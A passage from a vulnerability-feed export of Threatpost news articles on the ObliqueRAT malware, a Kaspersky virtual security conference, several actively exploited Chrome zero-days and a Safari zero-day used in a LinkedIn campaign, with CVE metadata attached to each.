researchers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102156/ObliqueRAT-Payloads-2.png>)\n\nThe evolution of ObliqueRAT\u2019s payloads. Credit: Cisco Talos\n\n\u201cIt is highly likely that these changes are in response to previous disclosures to achieve evasion for these new campaigns,\u201d they said. \u201cThe usage of compromised websites is another attempt at detection evasion.\u201d\n\nThe macros also have adopted a new tactic for achieving reboot persistence for the ObliqueRAT payloads. This is accomplished by creating a shortcut (.URL file extension) in the infected user\u2019s Startup directory, said researchers. Once the computer reboots, the payloads will then still be able to run.\n\n## **RevengeRAT: Researchers Link With \u2018Low Confidence\u2019**\n\nResearchers said that they observed overlaps in the command-and-control (C2) server infrastructure between ObliqueRAT and a RevengeRAT campaign. However, they only made the connection with \u201clow confidence\u201d due to lack of any other more substantial evidence.\n\nRevengeRAT is a [commodity malware family](<https://threatpost.com/malware-dropper-dual-rats/150271/>) that [has been used](<https://threatpost.com/iranian-apt33-shakes-up-cyberespionage-tactics/146041/>) by Iran-linked, espionage-focused [threat group APT33](<https://threatpost.com/apt33-mounts-targeted-botnet-attacks-us/150248/>) in the past. The RAT collects and exfiltrates information from the victim\u2019s system.\n\nPreviously, researchers also made links between ObliqueRAT and Crimson RAT. The functionalities of Crimson RAT [include stealing credentials](<https://threatpost.com/apt36-taps-coronavirus-as-golden-opportunity-to-spread-crimson-rat/153776/>) from victims\u2019 browsers, capturing screenshots, collecting antivirus software information, and listing the running processes, drives and directories from victim machines. Researchers said that the two RATs shared \u201csimilar maldocs and macros\u201d in previous ObliqueRAT campaigns.\n\n\u201cThis malware has links to the Transparent Tribe group that has historically targeted entities in South Asia,\u201d Malhotra told Threatpost. \u201cAs is the case with most suspected APT campaigns, this campaign is also low volume. A low-volume campaign has better chances of remaining undiscovered for longer periods of time thus increasing the chances of success for the attackers.\u201d\n", "cvss3": {}, "published": "2021-03-02T17:06:51", "type": "threatpost", "title": "Compromised Website Images Camouflage ObliqueRAT Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21166"], "modified": "2021-03-02T17:06:51", "id": "THREATPOST:CF9E25BD324C5940B0795721CA134155", "href": "https://threatpost.com/website-images-obliquerat-malware/164395/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-24T20:49:12", "description": "As the COVID-19 pandemic continues to force in-person cybersecurity event cancellations, Kaspersky is forging ahead with a virtual security summit, SAS@home.\n\nTopics on [the agenda](<https://thesascon.com/SAS@home>) include threat intel on advanced persistent threats (APTs), new vulnerability research, and topics related to a post-crisis world \u2013 such as how the industry is changing because of the pandemic.\n\nThe online conference, scheduled for April 28-30, is meant to complement the firm\u2019s annual Security Analyst Summit (SAS). The in-person SAS event was originally scheduled for April in Barcelona, and will now take place in November \u2013 with SAS@home providing an opportunity for community to come together and share insights and research in the meantime.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nExperts from across the IT security industry will present three days of knowledge sharing, [pecha-kucha moments](<https://www.pechakucha.com/>), \u201cfireside chats\u201d and Master Class training sessions. The sessions will be presented live, free to all participants via the ON24 webinar platform, with on-demand replays available after the fact. The event will run each day from 11 a.m. to 1 p.m. ET.\n\n\u201c[Attendees] will enjoy a unique opportunity to chat online and learn from some of the world\u2019s leading cybersecurity researchers and influencers in a welcoming atmosphere, while also taking a deep dive into a top-notch program of topical presentations typical for the regular SAS,\u201d Kaspersky said in a media statement.\n\nPresentations will cover new, unpublished research as well as the latest evolutions of known trends. For instance, \u201cHiding in Plain Sight: An APT Comes into a Market\u201d on Tuesday will feature Kaspersky researchers Alexey Firsh and Lev Pikman opening the kimono on previously undisclosed threat intelligence regarding a nation-state cybercriminal group.\n\nMeanwhile, \u201cZero-day Exploits of Operation WizardOpium,\u201d also on Tuesday, will feature Kaspersky researchers Anton Ivanov and Boris Larin offering a deep dive and new information regarding the weapons arsenal of a sophisticated threat group. The group shares characteristics with known APTs like DarkHotel and Lazarus Group \u2013 but have evaded any serious attribution attempts. WizardOpium attacks [were seen in November](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) using a zero-day for Google\u2019s Chrome browser (CVE-2019-13720) and [in December](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) exploiting yet another to gain elevation-of-privilege (CVE-2019-1458) on targets as well as to escape the Chrome process sandbox.\n\nAlso of note in the agenda are presentations from third-party researchers, including Joe FitzPatrick, researcher with Securing Hardware; Ryan Naraine, director of security strategy at Intel; Sounil Yu, CISO in residence at YL Ventures; and Alex Frappier, director of strategic partnerships with the CanCyber Foundation. Other third-party speakers are to be announced.\n\nFitzPatrick, who [spoke at last year\u2019s SAS event](<https://threatpost.com/sas-2019-joe-fitzpatrick-warns-of-the-5-supply-chain-attack/143684/>) in Singapore, will use his session on Tuesday, \u201cHardware Hacking Under Quarantine,\u201d to show off almost a dozen unique avenues where an attacker might access PCI express interfaces in a computer\u2019s hardware in order to mount a [direct memory access (DMA) attack](<https://threatpost.com/rambleed-side-channel-privileged-memory/145629/>) on the target system.\n\n\u201cUp to this point the majority of the research has been done against laptop, desktop and server systems through full-size PCI express ports or Thunderbolt ports,\u201d FitzPatrick told Threatpost. \u201cI quickly show a bunch of places, including on smaller embedded devices, where this can also be done.\u201d\n\nFitzPatrick\u2019s session will be in a pecha-kucha 20\u00d720 presentation format, where the speaker shows 20 images, each for 20 seconds, to tell a 400-second story with visuals guiding the way. Another pecha-kucha presentation will come from Kaspersky\u2019s David Jacoby, who [also spoke at last year\u2019s event](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>). For SAS@home, he\u2019ll be presenting on \u201cHow Does COVID-19 Affect the Internet?\u201d on Wednesday.\n\nCanCyber\u2019s Frappier meanwhile will be giving a deep-dive training Master Class on Thursday on the importance of body language. Specifically, he\u2019ll be discussing how red teams can use an understanding of nonverbal cues as a way to increase their chances of success while making impersonation or [\u201cvishing\u201d attacks](<https://threatpost.com/romanian-hackers-extradited-to-u-s-over-18m-vishing-scam/131763/>).\n\nFrappier told Threatpost that the subject is important in the context of today\u2019s threat landscape given that falling for social-engineering attacks is an enduring issue, and at the same time, video has become an important communication avenue in today\u2019s challenging times.\n\n\u201cWe have a difficult time reading people, and our adversaries are aware of this,\u201d he told Threatpost. \u201cYet, this is a two-way street. Better reading and understanding of the nonverbal will make us better at detecting important threats. Better encoding for our nonverbal message will allow us to become better communicators. We will get our message across and will get buy-in from managers and commercial partners.\u201d\n\nAs for the other planned sessions, Intel\u2019s Naraine will offer a Tuesday fireside chat on what cybersecurity could look like in a post-crisis world, on the other side of the pandemic. Kaspersky\u2019s Costin Raiu meanwhile will offer another Master Class (topic to be determined) on Wednesday; and on Thursday, Igor Kuznetsov of Kaspersky will present a session on \u201cStatic Binary Analysis: The Essentials.\u201d\n\nThe agenda will also feature a few surprise guests, according to conference organizers.\n\nYou can keep up with the event via Threatpost, which will be providing daily reports on the virtual conference.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-24T20:44:05", "type": "threatpost", "title": "SAS@Home Virtual Summit Showcases New Threat Intel, Industry Changes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "modified": "2020-04-24T20:44:05", "id": "THREATPOST:230DF95E70EB9C4F372C198798822D19", "href": "https://threatpost.com/sashome-virtual-summit-showcases-threat-intel/155128/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:42:49", "description": "UPDATE\n\nGoogle is warning users of a high-severity vulnerability in its Chrome browser that is currently being exploited by attackers to hijack computers.\n\nThe flaw ([CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-13720>)), discovered by security researchers Anton Ivanov and Alexey Kulaev at Kaspersky, exists in Google Chrome\u2019s audio component. Google is urging users to update to the latest version of Chrome, 78.0.3904.87 (for Windows, Mac, and Linux) as it rolls out over the coming days.\n\n\u201cThis [updated] version addresses vulnerabilities that an attacker could exploit to take control of an affected system,\u201d according to a Thursday Cybersecurity and Infrastructure Security Agency [(CISA) alert](<https://www.us-cert.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome>). \u201cOne of these vulnerabilities (CVE-2019-13720) was detected in exploits in the wild.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug (CVE-2019-13720) is a use-after-free flaw, which is a memory corruption flaw where an attempt is made to access memory after it has been freed. This can cause an array of malicious impacts, from causing a program to crash, to potentially leading to execution of arbitrary code \u2013 or even enable full remote code execution capabilities.\n\nCostin Raiu, director of Global Research and Analysis Team at Kaspersky, [wrote on Twitter](<https://twitter.com/craiu/status/1190260465139691522>) \u201ca few days ago our technologies caught a new Chrome 0day exploit used in the wild and we reported it to Google.\u201d\n\n> A few days ago our technologies caught a new Chrome 0day exploit used in the wild and we reported it to Google. Just released-Chrome 78 patches it, credits to my colleagues [@antonivanovm](<https://twitter.com/antonivanovm?ref_src=twsrc%5Etfw>) and Alexey Kulaev for finding the bug. <https://t.co/Bgm0QtNO2d>\n> \n> \u2014 Costin Raiu (@craiu) [November 1, 2019](<https://twitter.com/craiu/status/1190260465139691522?ref_src=twsrc%5Etfw>)\n\nKaspersky researchers are calling the exploits [Operation WizardOpium](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>). The attack leveraged a waterhole-style injection on a Korean-language news portal, they said.\n\nA malicious JavaScript code was inserted in the main page, which then loaded a profiling script from a remote site. Researchers said that the exploit \u201cused a race condition bug between two threads due to missing proper synchronization between them. It gives an attacker an a Use-After-Free condition that is very dangerous because it can lead to code execution scenarios.\u201d\n\n\u201cSo far, we have been unable to establish a definitive link with any known threat actors,\u201d they said in a Friday analysis. \u201cThere are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) attacks that have recently deployed similar false flag attacks.\u201d\n\nGoogle and researchers remain tight lipped intentionally. \u201cAccess to bug details and links may be kept restricted until a majority of users are updated with a fix,\u201d according to [Google\u2019s alert](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>). \u201cWe will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d Google said in its advisory.\n\n[Use-after-free flaws](<https://threatpost.com/tag/use-after-free/>) have plagued Google\u2019s Chrome browser as of recent. In [August, ](<https://threatpost.com/google-high-severity-blink-browser-engine-flaw/147770/>)Google disclosed a high-severity use-after-free vulnerability (CVE-2019-5869) in Blink, an open-source [browser engine](<https://www.chromium.org/blink>) that powers the Google Chrome browser, that could enable remote attackers to execute code and carry out other malicious attacks.\n\nGoogle on Thursday also disclosed another high-severity vulnerability (CVE-2019-13721) in PDFium, which was developed by Foxit and Google and provides developers with capabilities to leverage an open-source software library for viewing, and searching PDF documents.\n\nThis flaw is also a use-after-free vulnerability but there are no reports of it being exploited in the wild. It was disclosed by a researcher under the alias \u201cbanananapenguin\u201d who received a $7500 bounty through Google\u2019s vulnerability disclosure program for the discovery.\n\n_This post was updated on Nov. 1 at 4pm EST to reflect further details about the detected exploit._\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2019-11-01T15:35:03", "type": "threatpost", "title": "Google Discloses Chrome Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5869"], "modified": "2019-11-01T15:35:03", "id": "THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "href": "https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-15T11:25:30", "description": "Threat actors used a Safari zero-day flaw to send malicious links to government officials in Western Europe via LinkedIn before researchers from Google discovered and reported the vulnerability.\n\nThat\u2019s the word from researchers from Google Threat Analysis Group (TAG) and Google Project Zero, who Wednesday [posted a blog](<https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/>) shedding more light on several zero-day flaws that they discovered so far this year. Researchers in particular detailed how attackers exploited the vulnerabilities\u2014the prevalence of which are on the rise\u2013before they were addressed by their respective vendors.\n\nTAG researchers discovered the Safari WebKit flaw, tracked as [CVE-\u200b2021-1879](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1879>), on March 19. The vulnerability allowed for the processing of maliciously crafted web content for universal cross site scripting and was addressed by Apple in [an update](<https://support.apple.com/en-us/HT212256>) later that month.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nBefore the fix, researchers assert Russian-language threat actors were exploiting the vulnerability in the wild by using LinkedIn Messaging to send government officials from Western European countries malicious links that could collect website-authentication cookies, according to the post by Maddie Stone and Clement Lecigne from Google TAG.\n\n\u201cIf the target visited the link from an iOS device, they would be redirected to an attacker-controlled domain that served the next-stage payloads,\u201d they wrote.\n\nThe exploit, which targeted iOS versions 12.4 through 13.7, would turn off [Same-Origin-Policy](<https://en.wikipedia.org/wiki/Same-origin_policy>) protections on an infected device to collect authentication cookies from several popular websites\u2013including Google, Microsoft, LinkedIn, Facebook and Yahoo\u2013and then send them via WebSocket to an attacker-controlled IP, researchers wrote. The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated.\n\nMoreover, the campaign targeting iOS devices coincided with others from the same threat actor\u2014which Microsoft has identified as Nobelium\u2013targeting users on Windows devices to deliver Cobalt Strike, researchers wrote. Security firm Volexity described one of these attacks [in a report](<https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/>) posted online in May, the researchers added.\n\nNobellium is believed to be a Russia-based threat group responsible for the [expansive cyber-espionage SolarWinds](<https://threatpost.com/feds-russia-culprit-solarwinds/162785/>) campaign, which affected numerous U.S. government agencies and tech companies, including Microsoft.\n\n## **Other Zero-Day Attacks**\n\nGoogle researchers also linked three additional zero-day flaws they identified this year to a commercial surveillance vendor, according to [Google TAG\u2019s Shane Huntley](<https://twitter.com/ShaneHuntley/status/1415340345500463113>). Two of those vulnerabilities\u2013[CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>) and [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>)\u2014were found in Chrome, and one, tracked as [CVE-2021-33742](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33742>), in Internet Explorer.\n\nCVE-2021-21166 and CVE-2021-30551, two Chrome rendered remote-code execution (RCE) flaws, were identified separately but later believed to be used by the same actor, researchers wrote in the blog. Google researchers discovered the former in February and the latter in June.\n\n\u201cBoth of these 0-days were delivered as one-time links sent by email to the targets, all of whom we believe were in Armenia,\u201d Stone and Lecigne wrote. \u201cThe links led to attacker-controlled domains that mimicked legitimate websites related to the targeted users.\u201d\n\nWhen prospective victims clicked the link, they were redirected to a webpage that would fingerprint their device, collect system information about the client, and generate ECDH keys to encrypt the exploits, researchers wrote. This info\u2014which included screen resolution, timezone, languages, browser plugins, and available MIME types\u2014would then be sent back to the exploit server and used by attackers to decide whether or not an exploit should be delivered to the target, they said.\n\nResearchers also identified a separate campaigned in April that also targeted Armenian users by leveraging CVE-2021-26411, an RCE bug found in Internet Explorer (IE). The campaign loaded web content within IE that contained malicious Office documents, researchers wrote.\n\n\u201cThis happened by either embedding a remote ActiveX object using a Shell.Explorer.1 OLE object or by spawning an Internet Explorer process via VBA macros to navigate to a web page,\u201d Stone and Lecigne explained.\n\nAt the time, researchers said they were unable to recover the next-stage payload, but successfully recovered the exploit after discovering an early June campaign from the same actors. Microsoft patched the flaw later that month, they said.\n\n\n\nClick to Zoom CREDIT: TAG\n\n## **Why There is an Increase in Zero-Days?**\n\nAll in all, security researchers have identified 33 [zero-day flaws](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) so far in 2021, which is 11 more than the total number from 2020, according to the post.\n\nWhile that trend reflects an increase in the number of these types of vulnerabilities that exist, Google researchers \u201cbelieve greater detection and disclosure efforts are also contributing to the upward trend,\u201d they wrote.\n\nStill, it\u2019s highly possible that attackers are indeed using more [zero-day exploits](<https://threatpost.com/zero-day-wipe-my-book-live/167422/>) for a few reasons, researchers noted. One is that the increase and maturation of security technologies and features means attackers also have to level up, which in turn requires more [zero-day vulnerabilities](<https://threatpost.com/solarwinds-hotfix-zero-day-active-attack/167704/>) for functional attack chains, they said.\n\nThe growth of mobile platforms also has resulted in an increase in the number of products that threat actors want to target\u2014hence more reason to use zero-day exploits, researchers observed. Perhaps inspired by this increase in demand, commercial vendors also are selling more access to zero-days than in the early 2010s, they said.\n\nFinally, the maturation of security protections and strategies also inspires sophistication on the part of attackers as well, boosting the need for them to use zero-day flaws to convince victims to install malware, researchers noted.\n\n\u201cDue to advancements in security, these actors now more often have to use 0-day exploits to accomplish their goals,\u201d Stone and Lecigne wrote.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-15T11:04:49", "type": "threatpost", "title": "Safari Zero-Day Used in Malicious LinkedIn Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-26411", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-07-15T11:04:49", "id": "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "href": "https://threatpost.com/safari-zero-day-linkedin/167814/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-21T12:26:16", "description": "Google released an [update](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) to its Chrome browser that patches a zero-day vulnerability in the software\u2019s FreeType font rendering library that was actively being exploited in the wild.\n\nSecurity researcher Sergei Glazunov of [Google Project Zero](<https://googleprojectzero.blogspot.com/>) discovered [the bug](<https://twitter.com/benhawkes/status/1318640422571266048>) which is classified as a type of memory-corruption flaw called a heap buffer overflow in FreeType. Glazunov informed Google of the vulnerability on Monday. Project Zero is an internal security team at the company aimed at finding zero-day vulnerabilities.\n\nBy Tuesday, Google already had released a stable channel update, Chrome version 86.0.4240.111, that deploys five security fixes for Windows, Mac & Linux\u2013among them a fix for the zero-day, which is being tracked as CVE-2020-15999 and is rated as high risk. \n[](<https://threatpost.com/newsletter-sign/>) \n\u201cGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild,\u201d Prudhvikumar Bommana of the Google Chrome team wrote in a [blog post](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) announcing the update Tuesday. Google did not reveal further details of the active attacks that researchers observed.\n\n[Andrew R. Whalley](<https://twitter.com/arw>), a member of the Chrome security team, gave his team kudos on [Twitter](<https://twitter.com/arw/status/1318640817762807810>) for the \u201csuper-fast\u201d response to the zero-day.\n\nStill, Ben Hawkes, technical lead for the Project Zero team, warned that while Google researchers only observed the Chrome exploit, it\u2019s possible that other implementations of FreeType might be vulnerable as well since Google was so quick in its response to the bug. He referred users to a [fix](<https://savannah.nongnu.org/bugs/?59308>) by Glazunov posted on the FreeType Project page and urged them to update other potentially vulnerable software.\n\n\u201cThe fix is also in today\u2019s stable release of FreeType 2.10.4,\u201d Hawkes [tweeted](<https://twitter.com/benhawkes/status/1318640423485624320>).\n\nMeanwhile, security researchers took to Twitter to encourage people to update their Chrome browsers immediately to avoid falling victim to attackers aiming to exploit the flaw.\n\n\u201cMake sure you update your Chrome today! (restart it!),\u201d [tweeted](<https://twitter.com/securestep9/status/1318679358840754176>) London-based application security consultant Sam Stepanyan.\n\nIn addition to the FreeType zero day, Google patched four other bugs\u2014three of high risk and one of medium risk\u2013in the Chrome update released this week.\n\nThe high-risk vulnerabilities are: CVE-2020-16000, described as \u201cinappropriate implementation in Blink;\u201d CVE-2020-16001, described as \u201cuse after free in media;\u201d and CVE-2020-16002, described as \u201cuse after free in PDFium,\u201d according to the blog post. The medium-risk bug is being tracked as CVE-2020-16003, described as \u201cuse after free in printing,\u201d Bommana wrote.\n\nSo far in the last 12 months Google has patched three zero-day vulnerabilities in its Chrome browser. Prior to this week\u2019s FreeType disclosure, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "cvss3": {}, "published": "2020-10-21T12:23:29", "type": "threatpost", "title": "Google Patches Actively-Exploited Zero-Day Bug in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-6418"], "modified": "2020-10-21T12:23:29", "id": "THREATPOST:6F7E512F15913694CF17A906715FE678", "href": "https://threatpost.com/google-patches-zero-day-browser/160393/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-04T20:29:51", "description": "Flaws in Google\u2019s Chrome desktop and Android-based browsers were patched Monday in an effort to prevent known exploits from being used by attackers. Two separate security bulletins issued by Google warned that it is aware of reports that exploits for both exist in the wild. Google\u2019s Project Zero went one step further and asserted that both bugs are actively being exploited.\n\nIn its [Chrome browser update](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux, Google said that version 86.0.4240.183 fixes 10 vulnerabilities. Tracked as CVE-2020-16009, this bug is the most troubling, rated high-severity and is one of the two with active exploits. The vulnerability is tied to Google\u2019s open source JavaScript and WebAssembly engine called V8. In its disclosure, the flaw is described as an \u201cinappropriate implementation in V8\u201d.\n\nClement Lecigne of Google\u2019s Threat Analysis Group and Samuel Gross of Google Project Zero discovered the Chrome desktop bug on Oct. 29, according to a [blog post](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) announcing the fixes by Prudhvikumar Bommana of the Google Chrome team. If exploited, the V8 bug can be used for remote code execution, according to a separate analysis by Project Zero\u2019s team. \n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for the Android OS-based Chrome browser, also with an active exploit in the wild, Google warned [on Monday](<https://chromereleases.googleblog.com/2020/11/chrome-for-android-update.html>) of a sandbox escape bug (CVE-2020-16010). This vulnerability is rated high-severity and opened up a possible attack based on \u201cheap buffer overflow in UI on Android\u201d conditions. Credited for discovering the bug on Oct. 31 is Maddie Stone, Mark Brand and Sergei Glazunov of Google Project Zero.\n\n## **\u2018Actively Exploited in the Wild\u2019**\n\nGoogle said it was withholding the technical details of both bugs, pending the distribution of patches to effected endpoints. While Google said publicly known exploits existed for both bugs, it did not indicate that either one was under active attack. Google\u2019s own Project Zero technical lead Ben Hawkes tweeted on Monday that both were under active attack.\n\n\u201cToday Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android,\u201d he wrote.\n\n> Today Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android. <https://t.co/IOhFwT0Wx1>\n> \n> \u2014 Ben Hawkes (@benhawkes) [November 2, 2020](<https://twitter.com/benhawkes/status/1323374326150701057?ref_src=twsrc%5Etfw>)\n\nAs a precaution, Google said in its security update that it would \u201calso retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d according to the post.\n\n## **The Other Android Bugs**\n\nThe new Chrome Android release also includes stability and performance improvements, according to the Google Chrome team.\n\nVulnerabilities patched in the Chrome desktop update included a \u201cuse after free\u201d bug (CVE-2020-16004); an \u201cinsufficient policy enforcement in ANGLE\u201d flaw (CVE-2020-16005); an \u201cinsufficient data validation in installer\u201d issue (CVE-2020-16007) and a \u201cstack buffer overflow in WebRTC\u201d bug (CVE-2020-16008). Lastly there Google reported a \u201cheap buffer overflow in UI on Windows\u201d tracked as (CVE-2020-16011).\n\nThis week\u2019s Chrome updates come on the heels of zero-day bug [reported and patched last week](<https://threatpost.com/google-patches-zero-day-browser/160393/>) by Google effecting Chrome on Windows, Mac and Linux. The flaw (CVE-2020-15999), rated high-risk, is a vulnerability in Chrome\u2019s FreeType font rendering library.\n\nThe latest vulnerabilities mean that in that just over 12 months Google has patched a string of serious vulnerabilities in its Chrome browser. In addition to the three most recently reported flaws, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://www.zdnet.com/article/halloween-scare-google-discloses-chrome-zero-day-exploited-in-the-wild/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-03T17:23:23", "type": "threatpost", "title": "Two Chrome Browser Updates Plug Holes Actively Targeted by Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-14750", "CVE-2020-15999", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16011", "CVE-2020-6418"], "modified": "2020-11-03T17:23:23", "id": "THREATPOST:DF87733B74489628AB9F2C89704380A9", "href": "https://threatpost.com/chrome-holes-actively-targeted/160890/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-14T15:21:25", "description": "Google has addressed two zero-day security bugs that are being actively exploited in the wild.\n\nAs part of the internet giant\u2019s latest stable channel release (version 93.0.4577.82 for Windows, Mac and Linux), it fixed 11 total vulnerabilities, all of them rated high-severity. The two zero days are tracked as CVE-2021-30632 and CVE-2021-30633.\n\n\u201cGoogle is aware that exploits for [these] exist in the wild,\u201d the company said in its short website notice on the update, [issued Monday](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>).\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nGoogle is restricting any technical details \u201cuntil a majority of users are updated with a fix,\u201d it said. The vulnerabilities were reported anonymously, precluding any gleaning of details from the researcher who found them. Here\u2019s what we know:\n\n * CVE-2021-30632: Out of bounds write in V8 JavaScript Engine; and\n * CVE-2021-30633: Use after free in the IndexedDB API.\n\nOut-of-bounds write flaws [can result in](<https://cwe.mitre.org/data/definitions/787.html>) corruption of data, a crash or code execution. Use-after-free issues [can result in](<https://cwe.mitre.org/data/definitions/416.html>) any number of attack types, ranging from the corruption of valid data to the execution of arbitrary code. Both bugs have TBD bug-bounty awards attached to them and were reported on Sept. 8.\n\nV8 is Google\u2019s open-source, high-performance JavaScript and WebAssembly engine for Chrome and Chromium-based browsers. It translates JavaScript code into a more efficient machine code instead of using an interpreter, which speeds up the web browser. Since this vulnerable components is not specific to Google Chrome, it\u2019s a good bet that other browsers are affected by the bug as well.\n\nIndexedDB, meanwhile, allows users to persistently store large amounts of structured data client-side, inside their browsers. The API is a JavaScript application programming interface provided by web browsers for managing these NoSQL databases. It\u2019s a standard maintained by the World Wide Web Consortium.\n\n\u201cBrowser bugs discovered from exploitation in the wild are among the most significant security threats,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. \u201cNow that they are patched, exploitation will ramp up. That said, almost 20 years on and we haven\u2019t made web browsing safe shows that the 